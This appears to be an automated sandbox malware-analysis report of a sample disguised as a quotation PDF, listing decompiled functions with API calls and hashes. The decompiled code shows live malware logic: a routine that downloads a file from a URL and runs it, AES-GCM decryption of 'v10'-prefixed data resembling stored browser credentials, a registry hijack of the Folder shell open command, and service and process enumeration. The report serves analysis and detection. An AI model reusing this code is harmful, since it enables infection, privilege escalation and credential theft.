Part of subcall function 00421853: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,0042191F,0042191F,?,?,0042191F,005601F8,?,?,?,?,?,0040A3BA), ref: 004218C4
Part of subcall function 00421853: RegCloseKey.ADVAPI32(005601F8,?,?,0042191F,005601F8,?,?,?,?,?,0040A3BA,?,?), ref: 004218CD

FindResourceW.KERNEL32(?,00000066,WM_DSP,?,?,?,?,?,0040A3BA,?,?), ref: 00421932
LoadResource.KERNEL32(?,?,?,?,?,?,?,0040A3BA,?,?), ref: 00421941
SizeofResource.KERNEL32(?,?,?,?,?,?,?,0040A3BA,?,?), ref: 00421950
LockResource.KERNEL32(?,?,?,?,?,?,0040A3BA,?,?), ref: 0042195C

Part of subcall function 00421799: VirtualProtect.KERNEL32(?,000007D0,00000040,?,?,?,?,?,?,?,?,00421973), ref: 004217EA
Part of subcall function 00421799: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,?,?,?,?,?,?,00421973), ref: 00421809
Part of subcall function 00421799: GetWindowsDirectoryW.KERNEL32(00421973,00000104,?,?,?,?,?,?,?,00421973), ref: 0042181A
Part of subcall function 00421799: lstrlenW.KERNEL32(00421973,?,?,?,?,?,?,?,00421973), ref: 00421823

Strings

WM_DSP, xrefs: 00421928

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Resource$CloseFindOpenProcessTokenVirtuallstrlen$AdminAllocChangeCreateCurrentDirectoryFileInformationLoadLockModuleNameNotificationProtectSizeofUserValueWindows
String ID: WM_DSP
API String ID: 88121427-506093727
Opcode ID: 25a30b52f023cb6ec4fc905ca24e6c7c9ad1903adb2629357c17e8205da7ee1e
Instruction ID: 8336a7f545002a1facef05c0e596a3bd4b11b6146190a75bb5d8220777db885f
Opcode Fuzzy Hash: 25a30b52f023cb6ec4fc905ca24e6c7c9ad1903adb2629357c17e8205da7ee1e
Instruction Fuzzy Hash: E2016D70E80318BBDB106FA1ED0ABAEBF71BF00705F5041AAF411A52F2DBB55A51DA49

Uniqueness

Uniqueness Score: -1.00%

Function 0041B7F0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 208
serviceCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041B7F0(intOrPtr __ecx, void* __eflags) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				long _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _t139;
				intOrPtr _t142;
				signed int _t147;
				signed int _t148;
				signed int _t151;
				signed int _t155;
				signed int _t173;
				signed int _t178;
				signed int _t181;
				signed int _t200;
				signed int _t201;
				signed int _t214;
				intOrPtr _t226;
				void* _t229;

				_v12 = __ecx;
				_v28 = _v28 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v40 = _v40 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				E00406F52( &_v24);
				_v8 = _v8 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				while(1) {
					_v28 = OpenSCManagerW(0, L"ServicesActive", 5);
					if(_v28 == 0) {
						break;
					}
					_v40 = _v40 & 0x00000000;
					__imp__EnumServicesStatusExW(_v28, 0, 0x30, 3, 0, 0,  &_v32,  &_v36,  &_v40, 0);
					_v48 = _v32;
					_v8 = E0040B86A(_v32);
					_t139 =  &_v32;
					__imp__EnumServicesStatusExW(_v28, 0, 0x30, 3, _v8, _v48, _t139,  &_v36,  &_v40, 0);
					__eflags = _t139;
					if(_t139 != 0) {
						L6:
						CloseServiceHandle(_v28);
						_v56 = _v56 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						while(1) {
							__eflags = _v16 - _v36;
							if(_v16 >= _v36) {
								break;
							}
							_t173 = _v16 * 0x2c;
							_t214 = _v8;
							__eflags =  *(_t214 + _t173);
							if( *(_t214 + _t173) != 0) {
								E00406F64( &_v44,  *((intOrPtr*)(_v8 + _v16 * 0x2c)));
								_t178 = E004069E1( &_v44, _v12 + 0x28);
								__eflags = _t178;
								if(_t178 == 0) {
									E00406BE2();
									_t181 = _v16 + 1;
									__eflags = _t181;
									_v16 = _t181;
									continue;
								}
								_v56 = 1;
								E00406BFC( &_v24, E00406F64( &_v76,  *((intOrPtr*)(_v8 + _v16 * 0x2c))));
								E00406BE2();
								 *((intOrPtr*)(_v12 + 0x2c)) =  *((intOrPtr*)(_v8 + 0x24 + _v16 * 0x2c));
								E00406BE2();
								break;
							}
							break;
						}
						__eflags = _v56;
						if(_v56 != 0) {
							_t142 = _v12;
							__eflags =  *(_t142 + 0x2c);
							if( *(_t142 + 0x2c) != 0) {
								_v20 = _v20 & 0x00000000;
								while(1) {
									__eflags = _v20 - _v36;
									if(_v20 >= _v36) {
										break;
									}
									_t147 = _v20 * 0x2c;
									_t200 = _v8;
									__eflags =  *(_t200 + _t147);
									if( *(_t200 + _t147) != 0) {
										_t148 = _v20 * 0x2c;
										_t201 = _v8;
										_t226 = _v12;
										__eflags =  *((intOrPtr*)(_t201 + _t148 + 0x24)) -  *((intOrPtr*)(_t226 + 0x2c));
										if( *((intOrPtr*)(_t201 + _t148 + 0x24)) !=  *((intOrPtr*)(_t226 + 0x2c))) {
											L29:
											_t151 = _v20 + 1;
											__eflags = _t151;
											_v20 = _t151;
											continue;
										}
										E00406F64( &_v64,  *((intOrPtr*)(_v8 + _v20 * 0x2c)));
										_t155 = E004069E1( &_v64,  &_v24);
										__eflags = _t155;
										if(_t155 == 0) {
											_v88 = _v12 + 0x44;
											__eflags = _v20 * 0x2c;
											E00406F64(_t229,  *((intOrPtr*)(_v8 + _v20 * 0x2c)));
											E004042CF(_v88,  &_v64);
										}
										E00406BE2();
										goto L29;
									}
									break;
								}
								__eflags = _v12 + 0x44;
								E004042AC(_v12 + 0x44);
								_v92 = 1;
								E00406BE2();
								return _v92;
							}
							__eflags = _v60 - 1;
							if(__eflags != 0) {
								E0041AC18(_v12, __eflags, _v12 + 0x28, 2);
								E0041ACE9(_v12, __eflags, _v12 + 0x28);
								_v60 = 1;
								E00401014(_v8);
								continue;
							}
							_v84 = _v84 & 0x00000000;
							E00406BE2();
							return _v84;
						}
						_v80 = _v80 & 0x00000000;
						E00406BE2();
						return _v80;
					}
					_v52 = GetLastError();
					__eflags = _v52 - 0xea;
					if(_v52 == 0xea) {
						goto L6;
					}
					_v72 = _v72 & 0x00000000;
					E00406BE2();
					return _v72;
				}
				_v68 = _v68 & 0x00000000;
				E00406BE2();
				return _v68;
			}

0x0041b7f6
0x0041b7f9
0x0041b7fd
0x0041b801
0x0041b805
0x0041b809
0x0041b80d
0x0041b814
0x0041b819
0x0041b81d
0x0041b821
0x0041b830
0x0041b837
0x00000000
0x00000000
0x0041b84d
0x0041b86c
0x0041b875
0x0041b881
0x0041b88e
0x0041b8a1
0x0041b8a7
0x0041b8a9
0x0041b8d1
0x0041b8d4
0x0041b8da
0x0041b8de
0x0041b8eb
0x0041b8ee
0x0041b8f1
0x00000000
0x00000000
0x0041b8f7
0x0041b8fb
0x0041b8fe
0x0041b902
0x0041b913
0x0041b922
0x0041b927
0x0041b929
0x0041b973
0x0041b8e7
0x0041b8e7
0x0041b8e8
0x00000000
0x0041b8e8
0x0041b92b
0x0041b948
0x0041b950
0x0041b963
0x0041b969
0x00000000
0x0041b969
0x00000000
0x0041b904
0x0041b97d
0x0041b981
0x0041b997
0x0041b99a
0x0041b99e
0x0041b9ef
0x0041b9fc
0x0041b9ff
0x0041ba02
0x00000000
0x00000000
0x0041ba04
0x0041ba08
0x0041ba0b
0x0041ba0f
0x0041ba13
0x0041ba17
0x0041ba1a
0x0041ba21
0x0041ba24
0x0041ba73
0x0041b9f8
0x0041b9f8
0x0041b9f9
0x00000000
0x0041b9f9
0x0041ba33
0x0041ba3f
0x0041ba44
0x0041ba46
0x0041ba4e
0x0041ba54
0x0041ba5e
0x0041ba66
0x0041ba66
0x0041ba6e
0x00000000
0x0041ba6e
0x00000000
0x0041ba11
0x0041ba78
0x0041ba7b
0x0041ba80
0x0041ba8a
0x00000000
0x0041ba8f
0x0041b9a0
0x0041b9a4
0x0041b9c6
0x0041b9d5
0x0041b9da
0x0041b9e4
0x00000000
0x0041b9e9
0x0041b9a6
0x0041b9ad
0x00000000
0x0041b9b2
0x0041b983
0x0041b98a
0x00000000
0x0041b98f
0x0041b8b1
0x0041b8b4
0x0041b8bb
0x00000000
0x00000000
0x0041b8bd
0x0041b8c4
0x00000000
0x0041b8c9
0x0041b839
0x0041b840
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0041B82A
EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041B86C
EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041B8A1
GetLastError.KERNEL32 ref: 0041B8AB

Strings

ServicesActive, xrefs: 0041B823

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID: ServicesActive
API String ID: 3587775597-3071072050
Opcode ID: bbd4f5983340e0663f85248fb4d356c2f53d36d369a0743d48ad4a112adc40ee
Instruction ID: 49d8b5286e2bc3402e114fe167f55349d5fec0498f4d471fc61e51a8ef4ac4d6
Opcode Fuzzy Hash: bbd4f5983340e0663f85248fb4d356c2f53d36d369a0743d48ad4a112adc40ee
Instruction Fuzzy Hash: C3911671D00209EFDB04DF94D982BEDB7B4FF14319F20416AE102BA191DB78AA85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0E3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT(00000000,AES,00000000,00000000,?,?,?,00419C87,00000000), ref: 0041A104
BCryptSetProperty.BCRYPT(00000000,ChainingMode,ChainingModeGCM,00000020,00000000,?,?,?,00419C87,00000000), ref: 0041A126
BCryptGenerateSymmetricKey.BCRYPT(00000000,00419C87,00000000,00000000,00000000,00000020,00000000,?,?,?,00419C87,00000000), ref: 0041A148

Strings

ChainingMode, xrefs: 0041A11C
ChainingModeGCM, xrefs: 0041A117
AES, xrefs: 0041A0FC

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
String ID: AES$ChainingMode$ChainingModeGCM
API String ID: 1692524283-1213888626
Opcode ID: 7366bb0c19a966c1b969e1be0654ce94ba5d837a3617c48046870f7b100aba37
Instruction ID: 84788589c5a6b9fab375b16f3d99749ee7d92c02e964ed6e06ff9fe5769fa55f
Opcode Fuzzy Hash: 7366bb0c19a966c1b969e1be0654ce94ba5d837a3617c48046870f7b100aba37
Instruction Fuzzy Hash: F2119770A91308FFEB21CF90DD0AB8D7BB1EB15715F608055F9006B2E0C7B5AA54DB08

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041A4DD(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v6;
				char _v7;
				char _v8;
				long _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				int _v96;
				void* _t67;
				void* _t78;
				long _t88;
				intOrPtr _t93;
				void* _t104;
				void* _t108;

				_t104 = __ecx;
				_v8 = 0x76;
				_v7 = 0x31;
				_v6 = 0x30;
				if(_a8 >= 3) {
					_t78 = E004012DD(_a4,  &_v8, 3);
					_t108 = _t108 + 0xc;
					_v28 = _t78;
					if(_v28 == 0) {
						if(_a12 == 0 || _a16 == 0) {
							L12:
							return _t78;
						} else {
							E0040132F( &_v96, 0, 0x40);
							_v96 = 0x40;
							_v92 = 1;
							_v88 = _a4 + 3;
							_v84 = 0xc;
							_v72 = _v88 + _a8 - 0x13;
							_v68 = 0x10;
							_t88 = _a8 - 3 - _v84 - _v68;
							_v12 = _t88;
							if(_t88 == 0) {
								return 0;
							}
							_t78 = LocalAlloc(0x40, _v12);
							_v16 = _t78;
							if(_v16 == 0) {
								goto L12;
							}
							_t93 = _v88 + _v84;
							__imp__BCryptDecrypt(_a16, _t93, _v12,  &_v96, 0, 0, _v16, _v12,  &_v12, 0);
							_v32 = _t93;
							if(_v32 != 0 || _v12 == 0) {
								return 0;
							} else {
								_v20 = E00401000(_v12 + 1);
								E0040132F(_v20, 0, _v12 + 1);
								E00401309(_v20, _v16, _v12);
								LocalFree(_v16);
								return _v20;
							}
						}
					}
				}
				_push(0);
				_t67 = E00419CAA(_t104, __eflags, _a4, _a8, 0, _a20, _a24, 0, 0,  &_v16,  &_v12);
				__eflags = _t67;
				if(_t67 != 0) {
					_v24 = E00401000(_v12 + 1);
					__eflags = _v12 + 1;
					E0040132F(_v24, 0, _v12 + 1);
					E00401309(_v24, _v16, _v12);
					LocalFree(_v16);
					return _v24;
				}
				return _t67;
			}

0x0041a4dd
0x0041a4e3
0x0041a4e7
0x0041a4eb
0x0041a4f3
0x0041a502
0x0041a507
0x0041a50a
0x0041a511
0x0041a51b
0x00000000
0x00000000
0x0041a52b
0x0041a533
0x0041a53b
0x0041a542
0x0041a54f
0x0041a552
0x0041a563
0x0041a566
0x0041a576
0x0041a579
0x0041a57c
0x00000000
0x0041a613
0x0041a587
0x0041a58d
0x0041a594
0x00000000
0x0041a611
0x0041a5b0
0x0041a5b7
0x0041a5bd
0x0041a5c4
0x00000000
0x0041a5cc
0x0041a5d7
0x0041a5e4
0x0041a5f5
0x0041a600
0x00000000
0x0041a606
0x0041a5c4
0x0041a51b
0x0041a511
0x0041a619
0x0041a635
0x0041a63d
0x0041a63f
0x0041a64c
0x0041a652
0x0041a659
0x0041a66a
0x0041a675
0x00000000
0x0041a67b
0x0041a67f

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 0041A587
LocalFree.KERNEL32(00000000), ref: 0041A600
BCryptDecrypt.BCRYPT(00000000,0000000C,?,00000040,00000000,00000000,00000000,?,?,00000000), ref: 0041A5B7

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

LocalFree.KERNEL32(00000003), ref: 0041A675

Strings

xqB, xrefs: 0041A4DD

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Local$FreeHeap$AllocAllocateCryptDecryptProcess
String ID: xqB
API String ID: 2985029260-190154993
Opcode ID: 657260baddc555c938fd26c7104e51e1dce1ff7bf393bf2df572ccfce844d2aa
Instruction ID: a4d4b9f1de00b67c480ea6d71da005bcf81955f5bda9627113e82226928d78c7
Opcode Fuzzy Hash: 657260baddc555c938fd26c7104e51e1dce1ff7bf393bf2df572ccfce844d2aa
Instruction Fuzzy Hash: AD513671D00208EFDF11DFE4CC45BEEBBB9AB04304F144066F914AA2A0D7799AA5DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF7D Relevance: 7.6, APIs: 5, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041DF7D(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				long _v20;
				long _v24;
				long _v28;
				union _SID_NAME_USE _v32;
				short _v64;
				short _v584;

				_v20 = _v20 & 0x00000000;
				_v24 = 0x10;
				_v8 = _v8 & 0x00000000;
				_v16.Value = 0;
				_v15 = 0;
				_v14 = 0;
				_v13 = 0;
				_v12 = 0;
				_v11 = 5;
				E0040132F( &_v584, 0, 0x208);
				_v28 = 0x104;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) != 0) {
					if(LookupAccountSidW(0, _v8,  &_v584,  &_v28,  &_v64,  &_v24,  &_v32) == 0) {
						_v20 = GetLastError();
					}
				} else {
					_v20 = GetLastError();
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				E00406F64(_a4,  &_v584);
				return _a4;
			}

0x0041df86
0x0041df8a
0x0041df91
0x0041df95
0x0041df99
0x0041df9d
0x0041dfa1
0x0041dfa5
0x0041dfa9
0x0041dfbb
0x0041dfc3
0x0041dfef
0x0041e020
0x0041e028
0x0041e028
0x0041dff1
0x0041dff7
0x0041dff7
0x0041e02f
0x0041e034
0x0041e034
0x0041e044
0x0041e04d

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041DFE7
GetLastError.KERNEL32 ref: 0041DFF1
LookupAccountSidW.ADVAPI32(00000000,00000000,?,00000104,?,00000010,?), ref: 0041E018
GetLastError.KERNEL32 ref: 0041E022
FreeSid.ADVAPI32(00000000), ref: 0041E034

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: ErrorLast$AccountAllocateFreeInitializeLookup
String ID:
API String ID: 2452037541-0
Opcode ID: ccd00309a8c8f64d8c3ba50320f2837acc43d2d87568dd0fbb348fc8a729393d
Instruction ID: 92f94ede36f0c9c6807f05d638fb5197efa88fc9d09195582a58db21043cea5c
Opcode Fuzzy Hash: ccd00309a8c8f64d8c3ba50320f2837acc43d2d87568dd0fbb348fc8a729393d
Instruction Fuzzy Hash: C7213B71D0024DEFEB10EBE0C949BDFBBB8AB14309F0040A6E605A6191E7B85749DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042170C Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042170C(void* _a4, char* _a8) {
				void* _v8;
				long _v12;
				int _v16;
				signed int _v20;
				struct _SECURITY_DESCRIPTOR* _v24;
				struct _SECURITY_ATTRIBUTES _v28;
				struct _SECURITY_DESCRIPTOR _v48;

				if(InitializeSecurityDescriptor( &_v48, 1) != 0) {
					if(SetSecurityDescriptorDacl( &_v48, 1, 0, 0) != 0) {
						_v28 = 0xc;
						_v24 =  &_v48;
						_v20 = _v20 & 0x00000000;
						_v12 = RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20006,  &_v28,  &_v8,  &_v16);
						if(_v12 != 0) {
							SetLastError(_v12);
							return 0;
						}
						RegCloseKey(_v8);
						_v8 = _v8 & 0x00000000;
						return 1;
					}
					return 0;
				}
				return 0;
			}

0x00421720
0x00421738
0x0042173e
0x00421748
0x0042174b
0x00421772
0x00421779
0x0042178f
0x00000000
0x00421795
0x0042177e
0x00421784
0x00000000
0x00421788
0x00000000
0x0042173a
0x00000000

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,?,00421A45,80000001,Software\Classes\Folder\shell\open\command), ref: 00421718
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,00421A45,80000001,Software\Classes\Folder\shell\open\command), ref: 00421730

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$DaclInitialize
String ID:
API String ID: 625223987-0
Opcode ID: 8b81e71f5558158e50db16579469f7100f67369729ca086665ad88371e62cc91
Instruction ID: b755cd9417c8c7ff67081a5e32df65048a2f171d87a024ab8b869cd43be7c73d
Opcode Fuzzy Hash: 8b81e71f5558158e50db16579469f7100f67369729ca086665ad88371e62cc91
Instruction Fuzzy Hash: 21115230A00308FBDF10DFA0DC45FEE7BB8AF45704F904462E601B6190D7799645AB59

Uniqueness

Uniqueness Score: -1.00%

Function 00420444 Relevance: 7.5, APIs: 5, Instructions: 44
processCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00420444(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				char _v528;
				intOrPtr _v556;
				void* _v564;

				_v564 = 0x22c;
				_v8 = CreateToolhelp32Snapshot(2, 0);
				if(_v8 != 0xffffffff) {
					_push( &_v564);
					if(Process32FirstW(_v8) == 0) {
						L6:
						CloseHandle(_v8);
						E00406F52(_a4);
						return _a4;
					}
					while(_v556 != _a8) {
						if(Process32NextW(_v8,  &_v564) != 0) {
							continue;
						}
						goto L6;
					}
					CloseHandle(_v8);
					E00406F64(_a4,  &_v528);
					return _a4;
				}
				E00406F52(_a4);
				return _a4;
			}

0x0042044d
0x00420461
0x00420468
0x0042047d
0x00420489
0x004204c7
0x004204ca
0x004204d3
0x00000000
0x004204d8
0x0042048b
0x004204c5
0x00000000
0x00000000
0x00000000
0x004204c5
0x00420499
0x004204a9
0x00000000
0x004204ae
0x0042046d
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042045B
Process32FirstW.KERNEL32(000000FF,0000022C), ref: 00420481
CloseHandle.KERNEL32(000000FF), ref: 00420499

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 698ae450a5eb25057a97f74ed1cbd051301b3da976c258df6fd777c49554423e
Instruction ID: d0370b65f9cbd8825c00e4397103ad75dbb8162cd58537ff9582e04859d9b505
Opcode Fuzzy Hash: 698ae450a5eb25057a97f74ed1cbd051301b3da976c258df6fd777c49554423e
Instruction Fuzzy Hash: 3A110030600119EFCF20EF60ED99AAD7BB9BF04344F908175F909A61A1C734AF51DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004059EE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004059EE(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				void* _v56;
				char _v64;
				char _v72;
				char _v80;
				intOrPtr _t63;

				_v12 = _a12;
				E00421456(_a8,  &_v8);
				_v20 = E00406C53( &_v8, __eflags, "\\");
				_v16 = E00406D2E(__eflags,  &_v24, 0xa);
				E00406CC1(_v20, _v16);
				E00406BE2();
				_v28 = E00401605(_v12,  &_v36);
				E00406CC1( &_v8, E00406DE1(_v28,  &_v32));
				E00406BE2();
				E00406BE2();
				_v40 = E00406F44( &_v8);
				_t63 = E00406F44(E00401605(_v12,  &_v48));
				_v44 = _t63;
				__imp__URLDownloadToFileW(0, _v44, _v40, 0, 0);
				_v52 = _t63;
				E00406BE2();
				if(_v52 == 0) {
					_v56 = ShellExecuteW(0, L"open", E00406F44( &_v8), 0, 0, 5);
					__eflags = _v56 - 0x20;
					if(_v56 > 0x20) {
						E00409811(_a4, E00408356( &_v80, 0));
						E0040833C( &_v80);
						return E00406BE2();
					}
					E00409811(_a4, E00408356( &_v72, 2));
					E0040833C( &_v72);
					return E00406BE2();
				}
				E00409811(_a4, E00408356( &_v64, 1));
				E0040833C( &_v64);
				return E00406BE2();
			}

0x004059f7
0x00405a01
0x00405a13
0x00405a23
0x00405a2c
0x00405a34
0x00405a45
0x00405a58
0x00405a60
0x00405a68
0x00405a75
0x00405a86
0x00405a8b
0x00405a9a
0x00405aa0
0x00405aa6
0x00405aaf
0x00405af2
0x00405af5
0x00405af9
0x00405b2e
0x00405b36
0x00000000
0x00405b3e
0x00405b09
0x00405b11
0x00000000
0x00405b19
0x00405abf
0x00405ac7
0x00000000

APIs

Part of subcall function 00406DE1: PathFindExtensionW.SHLWAPI(?,?,?,00405A54,?,?,004264EC,?), ref: 00406DF5

URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00405A9A
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00405AEC

Strings

, xrefs: 00405AF5
open, xrefs: 00405AE5

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: DownloadExecuteExtensionFileFindPathShell
String ID: $open
API String ID: 1284254518-119239145
Opcode ID: 3ec83950171572978416a795cc9f2f4a60cc523ea1a21c08b90285947718e5c4
Instruction ID: 30dfc4eed58cea7c681b883143b456d469cb64dfbac1f4908140ffeda0176db9
Opcode Fuzzy Hash: 3ec83950171572978416a795cc9f2f4a60cc523ea1a21c08b90285947718e5c4
Instruction Fuzzy Hash: A141C371904208AADB04FFA1DD92BEEB778EF14704F61407EE502B61E1EF786A15CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE7B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041EE7B(void* __eflags, intOrPtr _a4, char _a8) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v36;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v60;
				struct _WIN32_FIND_DATAW _v652;
				void* _t86;

				E00402A18( &_v36);
				_v8 = _v8 | 0xffffffff;
				_t5 =  &_a8; // 0x40606a
				_v8 = FindFirstFileW(E00406F44(_t5),  &_v652);
				_t88 = _v8 - 0xffffffff;
				if(_v8 != 0xffffffff) {
					do {
						E004022D9( &_v60);
						__eflags = _v652.dwFileAttributes & 0x00000010;
						if((_v652.dwFileAttributes & 0x00000010) == 0) {
							_t16 =  &_v44;
							 *_t16 = _v44 & 0x00000000;
							__eflags =  *_t16;
							_v20 = _v652.nFileSizeLow;
							_v16 = _v652.nFileSizeHigh;
							_t23 =  &_v16; // 0x40606a
							_v52 = _v20;
							_v48 =  *_t23;
						} else {
							_v44 = 1;
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x30], xmm0");
						}
						E00406BFC( &_v60, E00406F64( &_v12,  &(_v652.cFileName)));
						E00406BE2();
						_t86 = _t86 - 0x18;
						E00402606(_t86,  &_v60);
						E00401FAE( &_v36);
						E00401698( &_v60);
						__eflags = FindNextFileW(_v8,  &_v652);
					} while (__eflags != 0);
					E00401811(_a4, __eflags,  &_v36);
					E00401878( &_v36);
					E00406BE2();
					return _a4;
				}
				E00401811(_a4, _t88,  &_v36);
				E00401878( &_v36);
				E00406BE2();
				return _a4;
			}

0x0041ee87
0x0041ee8c
0x0041ee97
0x0041eea6
0x0041eea9
0x0041eead
0x0041eed3
0x0041eed6
0x0041eee1
0x0041eee4
0x0041eef7
0x0041eef7
0x0041eef7
0x0041ef01
0x0041ef0a
0x0041ef10
0x0041ef13
0x0041ef16
0x0041eee6
0x0041eee6
0x0041eeed
0x0041eef0
0x0041eef0
0x0041ef2c
0x0041ef34
0x0041ef39
0x0041ef42
0x0041ef4a
0x0041ef52
0x0041ef67
0x0041ef67
0x0041ef76
0x0041ef7e
0x0041ef86
0x00000000
0x0041ef8b
0x0041eeb6
0x0041eebe
0x0041eec6
